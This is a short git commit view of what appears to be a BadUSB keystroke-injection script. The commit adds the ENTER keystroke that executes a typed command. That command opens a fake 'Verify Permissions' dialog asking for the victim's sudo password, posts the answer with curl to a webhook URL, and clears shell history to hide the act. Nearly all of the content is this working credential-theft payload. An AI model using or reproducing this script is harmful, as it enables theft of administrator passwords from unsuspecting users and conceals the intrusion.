[+] Added Enter
parent
fbd205c260
commit
d795dc9364
|
@ -31,3 +31,4 @@ DELAY 500
|
||||||
|
|
||||||
REM All-in-one is important
|
REM All-in-one is important
|
||||||
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --password "Put your sudo password di continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit;
|
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --password "Put your sudo password di continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit;
|
||||||
|
ENTER
|
Loading…
Reference in New Issue